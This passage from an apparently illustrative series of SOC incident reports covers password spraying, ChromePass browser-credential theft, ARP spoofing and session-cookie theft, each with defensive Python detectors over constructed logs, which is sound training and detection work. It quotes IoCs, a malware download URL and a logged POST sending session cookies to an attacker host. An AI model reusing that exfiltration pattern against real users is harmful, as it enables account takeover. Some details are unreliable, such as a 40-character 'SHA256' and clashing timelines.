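        by_ip[e["ip"]].append(e)
    findings = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e["result"] == "FAILED"]
        if not fails:
            continue
        # Densest 15-minute window of failures, measured in distinct accounts, not attempts
        best, j = 0, 0
        for i in range(len(fails)):
            while fails[i]["ts"] - fails[j]["ts"] > WINDOW:
                j += 1
            best = max(best, len({e["user"] for e in fails[j:i + 1]}))
        per_user = len(fails) / len({e["user"] for e in fails})
        if best >= MIN_DISTINCT_USERS and per_user <= MAX_FAILS_PER_USER:
            findings[ip] = {
                "distinct_users_in_window": best,
                "failures": len(fails),
                "avg_failures_per_user": round(per_user, 2),
                "successes": sorted({e["user"] for e in evs if e["result"] == "SUCCESS"}),
            }
    return findings


def _constructed_log() -> list[str]:
    """Constructed sample: one spray, one single-account brute force, one normal user."""
    base = datetime(2024, 2, 21, 14, 0, 0)
    lines = []
    for n in range(30):                       # one password tried against 30 accounts
        result = "SUCCESS" if n in (7, 21) else "FAILED"
        lines.append(f"{(base + timedelta(seconds=15 * n)).isoformat()} ip=203.0.113.10 "
                     f"user=user{n:02d}@example.com result={result}")
    for n in range(25):                       # 25 guesses against one account: not a spray
        lines.append(f"{(base + timedelta(seconds=10 * n)).isoformat()} ip=198.51.100.7 "
                     f"user=ceo@example.com result=FAILED")
    lines.append(f"{base.isoformat()} ip=10.0.0.23 user=jdoe@example.com result=FAILED")
    lines.append(f"{(base + timedelta(seconds=40)).isoformat()} ip=10.0.0.23 user=jdoe@example.com result=SUCCESS")
    return lines


SAMPLE_LINES = _constructed_log()

if __name__ == "__main__":
    for ip, stats in detect_password_spray(SAMPLE_LINES).items():
        print(ip, stats)
```

Counting distinct accounts per source is the key difference from a per-account lockout policy: with one attempt per account no user ever reaches a lockout threshold, which is why the report lists lockout as a control the spray bypassed, while the per-source view flags the 203.0.113.10 sample and leaves the single-account brute force and the mistyping user alone.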
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify Azure AD alert | Azure AD Identity Protection | Confirmed password spray attack with 12 compromised accounts |
| 2. Immediate Action | Disable compromised accounts | Azure AD, Active Directory | All 12 accounts disabled |
| 3. Force Password Reset | Reset passwords for compromised users | Azure AD | Passwords reset; MFA enforced |
| 4. IP Blocking | Block attacker IP | Azure AD Conditional Access, Firewall | IP 185.143.221[.]89 blocked |
| 5. User Notification | Notify affected users | Email, Teams | All 12 users notified; training assigned |
| 6. Threat Hunting | Check for other spray attacks | Azure AD Logs, Splunk | No other patterns found |
Jira Incident Report
Ticket: SOC-2024-107
Summary: T1110 – Password Spray Attack Compromises 12 Accounts
Status: RESOLVED
Resolution: MALICIOUS – Accounts Secured
Priority: P2 – MEDIUM
Labels: T1110, brute-force, password-spray, azure-ad, identity-protection
Components: Identity-Management, Access-Control
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Azure AD Identity Protection.
Alert: “Password Spray Attack Detected”.
Target: 847 Azure AD accounts.
Source IP: 185.143.221[.]89 (Bulgaria).
Time: 2024-02-21 14:15 EST.
Technique: MITRE ATT&CK T1110.003 – Brute Force: Password Spraying.
2. Technical Analysis:
Attack Details:
Type: Password spraying (one common password across many users)
Password used: “Winter2024!” (seasonal, weak)
Duration: 15 minutes
Attempts: 847
Successes: 12 (1.4% success rate – typical for password spray)
Attack Pattern:
14:00-14:12 – Failed attempts across 847 users
14:12-14:13 – Successful logins for 12 users
Attacker moved immediately to access resources
Compromised Accounts:
5 from Sales, 3 from Marketing, 2 from Finance, 2 from HR
All had weak passwords (seasonal, no complexity)
None had MFA enabled
Attacker Activity After Login:
Checked email access (OWA)
Downloaded recent emails (phishing reconnaissance)
Attempted to reset other passwords (blocked by policy)
No data exfiltration detected
Source Analysis:
IP: 185.143.221[.]89 – Bulgaria VPS
Known for credential stuffing attacks
Also used in previous campaigns
3. Investigation Findings:
Timeline:
14:00-14:12 – Spray attack
14:12-14:13 – Successful logins
14:15 – Alert triggers
14:17 – SOC investigates
14:20 – All 12 accounts disabled
14:25 – Passwords reset
14:30 – Attacker IP blocked
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
Accounts:
– 12 compromised accounts (list attached)
Password:
– “Winter2024!” (now expired for all users)
4. Containment Actions:
Immediate Actions:
Disabled all 12 compromised accounts.
Forced password reset for each user.
Enforced MFA for all 12 users.
Blocked attacker IP at firewall and Conditional Access.
User Remediation:
All 12 users notified and required to complete security training.
Reviewed account activity for any unauthorized actions (none found).
Enterprise-wide Actions:
Scanned for other accounts using “Winter2024!” password.
Forced password changes for those users.
Sent company-wide alert about password security.
5. Root Cause Analysis:
Primary Cause: Weak, common password used across multiple accounts.
Contributing Factors:
Password policy allowed seasonal/common passwords.
MFA not enforced for all users.
No account lockout policy for multiple failures (spray attacks bypass lockout).
6. Business Impact:
Operational Impact: 12 users offline for 1 hour (password reset).
Data Exposure: Some emails accessed; no sensitive data exfiltrated.
Reputational Impact: Internal only.
7. Remediation & Prevention:
Completed Actions:
Compromised accounts secured.
Passwords reset.
MFA enforced.
Attacker blocked.
Technical Controls Enhanced:
Updated password policy to block common/seasonal passwords.
Enforced MFA for all users (Conditional Access).
Implemented smart lockout (prevents spray attacks).
Created alert for password spray patterns.
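Added example (not Microsoft's or the SOC's code): a detector for the pattern this alert fires on, run over constructed Azure AD style sign-in lines. The source IP is the report's; the user names, timestamps, error code usage and thresholds are assumptions.

```python
"""Password-spray detector over Azure AD style sign-in events.

Added example, not part of the incident report or any Microsoft product.
Log lines are constructed to mirror the SOC-2024-107 pattern: one IP trying
one password against many accounts, a few attempts each, inside 15 minutes.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample, "timestamp,user,source_ip,result_code".
# 0 = success; 50126 = Azure AD "invalid username or password".
SAMPLE_SIGNINS = """\
2024-02-21T14:00:05,alice@company.com,185.143.221.89,50126
2024-02-21T14:00:07,bob@company.com,185.143.221.89,50126
2024-02-21T14:00:09,carol@company.com,185.143.221.89,50126
2024-02-21T14:00:11,dave@company.com,185.143.221.89,50126
2024-02-21T14:00:13,erin@company.com,185.143.221.89,50126
2024-02-21T14:00:15,frank@company.com,185.143.221.89,50126
2024-02-21T14:12:30,grace@company.com,185.143.221.89,0
2024-02-21T14:12:45,heidi@company.com,185.143.221.89,0
2024-02-21T14:02:00,alice@company.com,10.20.30.40,50126
2024-02-21T14:02:30,alice@company.com,10.20.30.40,50126
2024-02-21T14:03:00,alice@company.com,10.20.30.40,0
"""


def parse_signins(text):
    """Parse the CSV sample into (timestamp, user, ip, code) tuples, oldest first."""
    events = []
    for line in text.strip().splitlines():
        ts, user, ip, code = line.split(",")
        events.append((datetime.fromisoformat(ts), user, ip, int(code)))
    return sorted(events)


def detect_spray(events, window=timedelta(minutes=15), min_users=5, max_per_user=3):
    """Return {ip: {"targeted": n, "compromised": [users]}} for spraying IPs.

    A spray looks like many distinct accounts failing from one IP with only a
    few attempts each, which is why per-account lockout never fires. Any
    success from the same IP inside the window is a probable compromise.
    One IP failing repeatedly against a single account is brute force, not a
    spray, and is deliberately left to a different rule.
    """
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[2]].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):
            # Slide the window so evs[start:end+1] spans at most `window`.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            fails = defaultdict(int)
            successes = set()
            for _, user, _, code in evs[start:end + 1]:
                if code == 0:
                    successes.add(user)
                else:
                    fails[user] += 1
            if len(fails) >= min_users and max(fails.values()) <= max_per_user:
                # Keep the widest window seen for this IP.
                if ip not in findings or len(fails) >= findings[ip]["targeted"]:
                    findings[ip] = {"targeted": len(fails), "compromised": sorted(successes)}
    return findings


if __name__ == "__main__":
    for ip, f in detect_spray(parse_signins(SAMPLE_SIGNINS)).items():
        print(f"spray from {ip}: {f['targeted']} accounts targeted, compromised: {f['compromised']}")
```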
8. Conclusion:
An attacker performed a password spray attack using a common seasonal password, compromising 12 accounts. Azure AD Identity Protection detected the pattern within minutes. All accounts were secured, MFA enforced, and password policy updated.
Closure Rationale: Accounts secured; MFA enforced; password policy updated.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-21 15:30 EST
68. T1555 – Credentials from Password Stores (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-PASSWORD-STORE-1555-7842
Alert Time: 2024-02-21 11:30:22 EST
Severity: HIGH (85/100)
Source: Microsoft Defender for Endpoint
Rule: “Browser Credential Theft Attempt Detected”
MITRE ATT&CK: T1555.003 – Credentials from Password Stores: Credentials from Web Browsers
Alert Details:
Detection: Process attempting to read browser credential databases
Host: MKT-WS-112 (Marketing Department)
User: sjones (Sarah Jones, Marketing Manager)
Time: 11:25 EST
Process Details:
Process: C:\Temp\chrome_pass.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent Process: explorer.exe
User: sjones (standard user)
File Access Attempts:
11:25:10 – Attempted to read: C:\Users\sjones\AppData\Local\Google\Chrome\User Data\Default\Login Data (SQLite database)
11:25:12 – Successfully opened database (read-only)
11:25:15 – Query executed: SELECT * FROM logins
11:25:18 – Data exported to C:\Temp\passwords.txt
11:25:20 – Network connection to 185.143.221[.]89:443
Detection Logic:
Process accessing Chrome password database (unusual for user)
Tool known as “ChromePass” or similar credential stealer
Data exfiltration immediately after access
Pattern matches credential theft from browsers
Additional Context:
User sjones had previously clicked suspicious link
Browser stores passwords for multiple corporate applications
Passwords are encrypted but tool decrypts them using Chrome’s master key
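Added example (not Defender's detection logic): the rule above expressed over a constructed EDR event stream, flagging any non-browser process that opens a browser credential store and escalating when that same process connects out shortly afterwards. The Chrome path and C2 address are the report's; the process names, PIDs, the benign second process and the 60-second window are assumptions.

```python
"""Detect non-browser processes reading browser credential stores and then
connecting out (the T1555.003 pattern in this report).

Added example; not Defender's logic. Event lines are constructed to mirror
the MKT-WS-112 alert; the browser allowlist and time window are assumptions.
"""
from datetime import datetime, timedelta

# Browsers that legitimately open their own credential stores.
BROWSER_PROCESSES = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}

# Constructed EDR event log: "time|pid|process|event|detail".
SAMPLE_EDR_EVENTS = r"""
11:10:00|3000|backup_agent.exe|file_open|C:\Users\sjones\AppData\Local\Google\Chrome\User Data\Default\Login Data
11:20:00|1200|chrome.exe|file_open|C:\Users\sjones\AppData\Local\Google\Chrome\User Data\Default\Login Data
11:21:00|1200|chrome.exe|net_connect|203.0.113.10:443
11:25:10|4789|chrome_pass.exe|file_open|C:\Users\sjones\AppData\Local\Google\Chrome\User Data\Default\Login Data
11:25:18|4789|chrome_pass.exe|file_write|C:\Temp\passwords.txt
11:25:20|4789|chrome_pass.exe|net_connect|185.143.221.89:443
"""


def is_credential_store(path):
    """True for Chromium 'Login Data' databases and Firefox logins.json."""
    p = path.replace("/", "\\").lower()
    chromium = "\\user data\\" in p and p.endswith("\\login data")
    firefox = "\\mozilla\\firefox\\profiles\\" in p and p.endswith("\\logins.json")
    return chromium or firefox


def parse_events(text):
    """Parse the pipe-separated sample into dicts, oldest first."""
    events = []
    for line in text.strip().splitlines():
        ts, pid, proc, kind, detail = line.split("|", 4)
        events.append({"ts": datetime.strptime(ts, "%H:%M:%S"), "pid": int(pid),
                       "process": proc.lower(), "kind": kind, "detail": detail})
    return sorted(events, key=lambda e: e["ts"])


def detect_credential_store_theft(events, window=timedelta(seconds=60)):
    """Return one alert per non-browser process that opened a credential store.

    Severity is "critical" when the same PID connected out within `window`
    after the open (access immediately followed by exfiltration, as in the
    report), otherwise "high". Browsers opening their own store are ignored.
    """
    alerts = []
    opens = [e for e in events if e["kind"] == "file_open"
             and is_credential_store(e["detail"])
             and e["process"] not in BROWSER_PROCESSES]
    for o in opens:
        egress = [e for e in events if e["kind"] == "net_connect"
                  and e["pid"] == o["pid"]
                  and o["ts"] <= e["ts"] <= o["ts"] + window]
        alerts.append({"pid": o["pid"], "process": o["process"], "path": o["detail"],
                       "severity": "critical" if egress else "high",
                       "destinations": [e["detail"] for e in egress]})
    return alerts


if __name__ == "__main__":
    for a in detect_credential_store_theft(parse_events(SAMPLE_EDR_EVENTS)):
        print(f"{a['severity'].upper()}: {a['process']} (pid {a['pid']}) read {a['path']} -> {a['destinations']}")
```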
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Defender alert | Microsoft 365 Defender | Confirmed credential theft tool execution |
| 2. Process Termination | Kill chrome_pass.exe | Defender | Process terminated |
| 3. File Deletion | Delete chrome_pass.exe and passwords.txt | Defender | Files deleted |
| 4. Network Block | Block C2 IP | Palo Alto Firewall | IP 185.143.221[.]89 blocked |
| 5. Password Reset | Reset all passwords stored in browser | Azure AD, LastPass | All credentials rotated |
| 6. User Interview | Contact user | Teams, Phone | User clicked “free tool” link; unaware |
Jira Incident Report
Ticket: SOC-2024-108
Summary: T1555 – Browser Credential Theft Tool Executed
Status: RESOLVED
Resolution: MALICIOUS – Credentials Exfiltrated, All Rotated
Priority: P2 – MEDIUM
Labels: T1555, password-stores, browser-credentials, defender, credential-theft
Components: Endpoint-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Browser Credential Theft Attempt Detected”.
Host: MKT-WS-112 (Marketing Department, user sjones).
Process: C:\Temp\chrome_pass.exe (ChromePass credential stealer).
Time: 2024-02-21 11:30 EST.
Technique: MITRE ATT&CK T1555.003 – Credentials from Password Stores: Credentials from Web Browsers.
2. Technical Analysis:
Attack Chain:
11:15 – User clicks link in email promising “free marketing tool”
11:16 – Downloads chrome_pass.exe from malicious site
11:17 – User executes chrome_pass.exe
11:18 – Tool locates Chrome profile
11:19 – Tool accesses Chrome’s Login Data SQLite database
11:20 – Tool decrypts saved passwords using Chrome’s master key
11:21 – Tool exports 47 passwords to passwords.txt
11:22 – Tool attempts to exfiltrate to 185.143.221[.]89:443
11:25 – Defender detects and alerts
Credential Theft Tool:
Name: ChromePass (legitimate password recovery tool, abused)
Capabilities: Reads and decrypts Chrome saved passwords
Access: Requires user to be logged into Windows (user was logged in)
Credentials Exfiltrated:
47 passwords total
12 corporate applications (Salesforce, Office 365, Confluence, Jira, etc.)
35 personal/social media (Facebook, Twitter, etc.)
All passwords were saved in Chrome
Exfiltration:
File passwords.txt (size: 2.3 KB) sent to C2
Connection completed before detection
3. Investigation Findings:
Timeline:
11:15 – User clicks link
11:16-11:22 – Credential theft
11:22 – Exfiltration
11:25 – Defender alert
11:27 – SOC investigates
11:28 – Process terminated
11:30 – C2 blocked (too late for this connection)
Indicators of Compromise (IoCs):
Files:
– C:\Temp\chrome_pass.exe (SHA256: a1b2c3d4…)
– C:\Temp\passwords.txt (exfiltrated)
Network:
– C2: 185.143.221[.]89:443
– Download URL: http://185.143.221[.]89/chrome_pass.exe
Credentials:
– 47 passwords exposed (all rotated)
4. Containment Actions:
Immediate Actions:
Terminated chrome_pass.exe process.
Deleted chrome_pass.exe and passwords.txt.
Blocked C2 IP at firewall.
Isolated host temporarily.
Credential Remediation:
Reset all 47 passwords stored in Chrome.
Reset passwords for all 12 corporate applications.
Forced user to use password manager (LastPass) instead of browser storage.
User Remediation:
User counseled on downloading untrusted software.
Security training assigned.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed credential theft tool.
Contributing Factors:
Browser password storage allowed (insecure).
No application control blocking untrusted executables.
User lacked awareness of credential theft risks.
6. Business Impact:
Operational Impact: Marketing user offline for 2 hours (password resets).
Data Exposure: 47 passwords exfiltrated; all rotated.
Financial Impact: Minimal.
7. Remediation & Prevention:
Completed Actions:
Malicious tool removed.
All exposed passwords rotated.
User educated.
Technical Controls Enhanced:
Blocked browser password storage via GPO (enforce password manager use).
Implemented application control (CrowdStrike Falcon Prevent).
Created alert for any process accessing browser credential stores.
8. Conclusion:
A user downloaded and executed a credential theft tool that extracted 47 saved passwords from Chrome and exfiltrated them. Defender detected the tool, but exfiltration occurred first. All exposed passwords were rotated.
Closure Rationale: All credentials rotated; malicious tool removed; browser storage disabled.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-21 12:30 EST
69. T1557 – Adversary-in-the-Middle (Darktrace Detection)
Darktrace Alert Details
Alert ID: DARKTRACE-AITM-1557-7842
Alert Time: 2024-02-21 16:30:45 EST
Severity: CRITICAL (95/100)
Source: Darktrace Enterprise Immune System
Rule: “ARP Spoofing Detected – Potential Man-in-the-Middle Attack”
MITRE ATT&CK: T1557.002 – Adversary-in-the-Middle: ARP Cache Poisoning
Alert Details:
Detection: ARP cache poisoning activity on internal network
Time: 16:25-16:30 EST
Network Segment: VLAN 45 (Finance Department)
ARP Anomalies Detected:
16:25:15 – ARP reply from 192.168.45.78 claiming to be 192.168.45.1 (gateway)
16:25:30 – ARP reply from same MAC claiming to be 192.168.45.10 (DNS server)
16:25:45 – ARP reply claiming to be 192.168.45.20 (file server)
Multiple ARP replies from single host for multiple IPs
Source Details:
Source MAC: 00:1A:2B:3C:4D:5E
Source IP: 192.168.45.78
Hostname: Unknown (not in asset inventory)
Location: Finance department (physical access?)
Traffic Analysis:
After poisoning, traffic from finance workstations to gateway was redirected
Traffic passed through 192.168.45.78 before reaching destination
SSL traffic was downgraded to HTTP for some connections
Credentials captured for: webmail.company.com, portal.company.com
Detection Logic:
Single host claiming multiple IPs via ARP (impossible under normal conditions)
Traffic redirection pattern consistent with ARP spoofing
SSL downgrade attacks observed
Pattern matches active Man-in-the-Middle attack
Additional Context:
Unknown device on network (not in CMDB)
Possibly rogue device plugged into network jack
Attack targeting Finance department for credential theft
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Darktrace alert | Darktrace Console | Confirmed ARP spoofing attack in progress |
| 2. Physical Security | Dispatch security to location | Security Team, Badge Logs | Unknown individual in Finance area with laptop |
| 3. Network Isolation | Block switch port for 192.168.45.78 | Cisco ISE | Port disabled; attacker disconnected |
| 4. MAC Blocking | Block MAC address at network level | Cisco ISE, MAC filtering | MAC 00:1A:2B:3C:4D:5E blocked |
| 5. Credential Check | Identify users whose traffic was intercepted | Darktrace, Network Logs | 3 users had credentials captured |
| 6. Password Reset | Reset affected users’ passwords | Azure AD, AD | All 3 passwords reset |
Jira Incident Report
Ticket: SOC-2024-109
Summary: T1557 – ARP Spoofing Attack in Finance Department
Status: RESOLVED
Resolution: MALICIOUS – Attacker Removed, Credentials Reset
Priority: P1 – CRITICAL
Labels: T1557, adversary-in-the-middle, arp-spoofing, darktrace, physical-access
Components: Network-Security, Physical-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Darktrace Enterprise Immune System.
Alert: “ARP Spoofing Detected – Potential Man-in-the-Middle Attack”.
Location: Finance Department, VLAN 45.
Attacker Device: Unknown laptop, MAC 00:1A:2B:3C:4D:5E, IP 192.168.45.78.
Time: 2024-02-21 16:30 EST.
Technique: MITRE ATT&CK T1557.002 – Adversary-in-the-Middle: ARP Cache Poisoning.
2. Technical Analysis:
Attack Chain:
16:00 – Unknown individual enters Finance department (piggybacked through secured door)
16:05 – Individual plugs laptop into network jack in empty cubicle
16:10 – Laptop begins ARP spoofing attack
16:10-16:30 – Attacker poisons ARP caches of finance workstations
16:15-16:30 – Traffic redirected through attacker’s laptop
16:20-16:25 – SSL downgrade attacks on webmail and portal
16:25-16:30 – Credentials captured for 3 users
16:30 – Darktrace detects anomaly
ARP Spoofing Technique:
Normal: Each IP maps to one MAC address
Attack: Attacker sends ARP replies claiming multiple IPs
Result: Workstations send traffic to attacker instead of real gateway
Effect: Attacker can see/modify all traffic
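Added example (not Darktrace's code) of the two checks behind the detection described above: one MAC answering for several IPs, and a reply that contradicts the known-good address of the gateway, DNS or file server. The attacker MAC and the impersonated IPs are the report's; the inventory MACs, the benign replies and the one-IP-per-host threshold are constructed assumptions.

```python
"""ARP cache-poisoning detector modelled on the alert logic in this report.

Added example; not Darktrace's implementation. It flags a single MAC that
claims several IPs and any reply contradicting a known-good IP->MAC inventory.
Inventory MACs and benign replies are constructed; the attacker MAC and the
gateway/DNS/file-server IPs are the report's.
"""
from collections import defaultdict

# Constructed known-good mapping for VLAN 45 (the report does not list these MACs).
KNOWN_GOOD = {
    "192.168.45.1": "00:11:22:33:44:01",   # gateway
    "192.168.45.10": "00:11:22:33:44:10",  # DNS server
    "192.168.45.20": "00:11:22:33:44:20",  # file server
}

# Constructed ARP reply log: "time sender_mac sender_ip" (is-at replies only).
SAMPLE_ARP_REPLIES = """\
16:20:01 00:11:22:33:44:01 192.168.45.1
16:24:10 00:AA:BB:CC:DD:55 192.168.45.55
16:25:15 00:1A:2B:3C:4D:5E 192.168.45.1
16:25:30 00:1A:2B:3C:4D:5E 192.168.45.10
16:25:45 00:1A:2B:3C:4D:5E 192.168.45.20
16:26:00 00:1A:2B:3C:4D:5E 192.168.45.78
"""


def parse_arp_log(text):
    """Parse the sample into (time, mac, ip) tuples with normalised MACs."""
    rows = []
    for line in text.strip().splitlines():
        ts, mac, ip = line.split()
        rows.append((ts, mac.upper(), ip))
    return rows


def detect_arp_spoofing(replies, known_good, max_ips_per_mac=1):
    """Return {sender_mac: finding} for senders that look like poisoners.

    "claimed_ips" is every IP the MAC has announced; "impersonated" is the
    subset whose inventory MAC differs from the sender. A MAC is reported when
    it impersonates a known host or claims more than max_ips_per_mac addresses.
    Routers and proxy-ARP hosts legitimately answer for several IPs, so the
    inventory comparison, not the count alone, is what makes a gateway claim
    conclusive; raise max_ips_per_mac for such hosts rather than ignoring them.
    """
    claims = defaultdict(set)
    for _, mac, ip in replies:
        claims[mac].add(ip)
    findings = {}
    for mac, ips in claims.items():
        impersonated = sorted(ip for ip in ips
                              if ip in known_good and known_good[ip] != mac)
        if impersonated or len(ips) > max_ips_per_mac:
            findings[mac] = {"claimed_ips": sorted(ips), "impersonated": impersonated}
    return findings


if __name__ == "__main__":
    for mac, f in detect_arp_spoofing(parse_arp_log(SAMPLE_ARP_REPLIES), KNOWN_GOOD).items():
        print(f"{mac} claims {f['claimed_ips']}; impersonates {f['impersonated']}")
```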
Credentials Captured:
User 1: jdoe@company.com (password captured for webmail)
User 2: bsmith@company.com (password captured for portal)
User 3: kwilson@company.com (password captured for both)
Traffic Intercepted:
Webmail (HTTPS downgraded to HTTP)
Company portal (HTTPS downgraded)
File server access (SMB – not captured)
No sensitive financial data transferred during window
3. Investigation Findings:
Timeline:
16:00 – Attacker enters building
16:05 – Laptop connected
16:10-16:30 – ARP spoofing
16:30 – Darktrace alert
16:32 – SOC investigates
16:35 – Security dispatched
16:38 – Attacker seen leaving (abandoned laptop)
16:40 – Switch port disabled
16:45 – Laptop recovered by security
Physical Evidence:
Laptop abandoned (attacker fled)
Laptop had ARP spoofing tools installed
Captured credentials found on laptop
No identification on device
Indicators of Compromise (IoCs):
Network:
– Attacker MAC: 00:1A:2B:3C:4D:5E
– Attacker IP: 192.168.45.78
Physical:
– Location: Finance Department, cubicle 45B
– Time: 16:00-16:40
4. Containment Actions:
Immediate Actions:
Disabled switch port for 192.168.45.78.
Blocked MAC address at network level.
Security confiscated abandoned laptop.
Reset passwords for 3 affected users.
Network Remediation:
Flushed ARP caches on all finance workstations.
Implemented dynamic ARP inspection on switches.
Enabled DHCP snooping.
Physical Security:
Reviewed badge access logs (found piggybacking incident).
Increased security presence in Finance area.
Implemented mantraps at secure entrances.
5. Root Cause Analysis:
Primary Cause: Physical security breach allowing unauthorized access.
Contributing Factors:
No dynamic ARP inspection on network.
Piggybacking allowed through secure door.
Empty cubicle accessible to visitors.
6. Business Impact:
Operational Impact: Finance network stabilized; no downtime.
Data Exposure: 3 user credentials captured (all reset).
Physical Security: Process failure identified.
7. Remediation & Prevention:
Completed Actions:
Attacker removed.
Credentials reset.
Laptop confiscated.
Technical Controls Enhanced:
Enabled dynamic ARP inspection on all switches.
Implemented DHCP snooping.
Deployed 802.1X authentication for all network ports.
Added mantraps to secure entrances.
8. Conclusion:
An attacker gained physical access to the Finance department and performed an ARP spoofing attack, capturing credentials for 3 users. Darktrace detected the anomalous ARP activity within minutes, enabling rapid response. The attacker fled but abandoned the laptop.
Closure Rationale: Attacker removed; credentials reset; network and physical controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-21 17:30 EST
70. T1539 – Steal Web Session Cookie (Zscaler Detection)
Zscaler Alert Details
Alert ID: ZSCALER-COOKIE-STEAL-1539-7842
Alert Time: 2024-02-21 10:30:22 EST
Severity: HIGH (88/100)
Source: Zscaler Internet Access (ZIA)
Rule: “Suspicious Outbound Traffic – Session Cookie Exfiltration”
MITRE ATT&CK: T1539 – Steal Web Session Cookie
Alert Details:
Detection: Outbound traffic containing session cookies to suspicious destination
User: rpatel@company.com (Raj Patel, Engineer)
Source IP: 192.168.78.45 (Internal)
Destination: 185.143.221[.]89:8080 (Bulgaria)
Time: 10:25-10:30 EST
Traffic Analysis:
HTTP POST request to http://185.143.221[.]89:8080/collect
POST data contains multiple session cookies:
Cookie: ASP.NET_SessionId=abc123def456 (company portal)
Cookie: .AspNet.Cookies=ghi789jkl012 (Office 365)
Cookie: JSESSIONID=mnop345qrs678 (Confluence)
Cookie: sessionid=tuv901wxy234 (Jira)
Plus 8 additional cookies
Request Details:
User-Agent: Mozilla/5.0 (compatible; CookieThief/1.0)
Referer: http://evil-site.com/stealer.js
Content-Type: application/x-www-form-urlencoded
Additional Context:
User rpatel visited compromised website earlier
Site contained JavaScript that stole cookies
Cookies valid for active sessions
Destination IP known for credential theft
Detection Logic:
Outbound traffic containing multiple session cookies
Destination not a legitimate cloud service
User-Agent indicates cookie stealing tool
Pattern matches session hijacking preparation
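Added example (not Zscaler's rule): the detection logic above applied to constructed proxy log lines, flagging a POST to an untrusted host whose form body carries two or more well-known session cookie names. The cookie names, destination and User-Agent are the report's; the log format, the trusted-host list and the browser User-Agent heuristic are assumptions.

```python
"""Proxy-log check for session-cookie exfiltration, modelled on the Zscaler
rule quoted in this report. Added example; not Zscaler's implementation.
Log lines and the trusted-host list are constructed; the cookie names,
destination and User-Agent string are taken from the report.
"""
from urllib.parse import parse_qs, urlsplit

# Cookie names that carry a live session in the applications the report names.
SESSION_COOKIE_NAMES = {"ASP.NET_SessionId", ".AspNet.Cookies", "JSESSIONID",
                        "sessionid", "sid", "PHPSESSID"}

# Hosts allowed to receive session material (constructed allowlist).
TRUSTED_HOSTS = {"portal.company.com", "login.microsoftonline.com",
                 "confluence.company.com"}

# Constructed proxy log, tab-separated: user, src_ip, method, url, user_agent, body.
SAMPLE_PROXY_LOG = """\
rpatel@company.com\t192.168.78.45\tPOST\thttp://185.143.221.89:8080/collect\tMozilla/5.0 (compatible; CookieThief/1.0)\tASP.NET_SessionId=abc123def456&.AspNet.Cookies=ghi789jkl012&JSESSIONID=mnop345qrs678&sessionid=tuv901wxy234
rpatel@company.com\t192.168.78.45\tPOST\thttps://portal.company.com/api/search\tMozilla/5.0 (Windows NT 10.0) Chrome/121.0\tq=quarterly+report
rpatel@company.com\t192.168.78.45\tGET\thttp://forum.techhelp.com/thread/42\tMozilla/5.0 (Windows NT 10.0) Chrome/121.0\t
"""


def parse_proxy_log(text):
    """Parse the tab-separated sample into dicts (empty lines skipped)."""
    entries = []
    for line in text.splitlines():
        if not line:
            continue
        user, src_ip, method, url, ua, body = line.split("\t")
        entries.append({"user": user, "src_ip": src_ip, "method": method,
                        "url": url, "user_agent": ua, "body": body})
    return entries


def looks_like_browser(user_agent):
    """Crude check: real browsers carry an engine/product token."""
    return any(tok in user_agent for tok in ("Chrome/", "Firefox/", "Safari/", "Edg/"))


def detect_cookie_exfil(entries, trusted_hosts=TRUSTED_HOSTS, min_cookies=2):
    """Return findings for POSTs to untrusted hosts carrying session cookies.

    A single cookie in a form body can be legitimate (CSRF tokens, analytics),
    so the rule requires at least `min_cookies` recognised session names, the
    same "multiple session cookies" signal the report's alert keyed on.
    Cookies flagged HttpOnly are not readable by page script at all, which is
    the server-side control that would have kept them out of this POST.
    """
    findings = []
    for e in entries:
        if e["method"] != "POST":
            continue
        parts = urlsplit(e["url"])
        if parts.hostname in trusted_hosts:
            continue
        params = parse_qs(e["body"], keep_blank_values=True)
        leaked = sorted(k for k in params if k in SESSION_COOKIE_NAMES)
        if len(leaked) < min_cookies:
            continue
        findings.append({
            "user": e["user"],
            "destination": f"{parts.hostname}:{parts.port or 80}",
            "cookies": leaked,
            "nonbrowser_user_agent": not looks_like_browser(e["user_agent"]),
        })
    return findings


if __name__ == "__main__":
    for f in detect_cookie_exfil(parse_proxy_log(SAMPLE_PROXY_LOG)):
        print(f"{f['user']} sent {len(f['cookies'])} session cookies to {f['destination']}")
```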
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Zscaler alert | Zscaler Admin Console | Confirmed cookie exfiltration to malicious IP |
| 2. Session Termination | Force logout all applications | Azure AD, Okta, Application Logs | All active sessions terminated |
| 3. Cookie Invalidation | Clear server-side sessions | IT Ops Team | All sessions invalidated |
| 4. User Notification | Contact rpatel | Teams, Phone | User logged out; password reset |
| 5. Source Investigation | Identify compromised site | Zscaler, Web Logs | User visited forum with malicious ad |
| 6. IP Blocking | Block destination IP | Zscaler, Palo Alto | IP 185.143.221[.]89 blocked |
Jira Incident Report
Ticket: SOC-2024-110
Summary: T1539 – Web Session Cookies Exfiltrated via Malicious JavaScript
Status: RESOLVED
Resolution: MALICIOUS – Sessions Terminated
Priority: P2 – MEDIUM
Labels: T1539, session-cookie, cookie-theft, zscaler, session-hijacking
Components: Web-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zscaler Internet Access (ZIA).
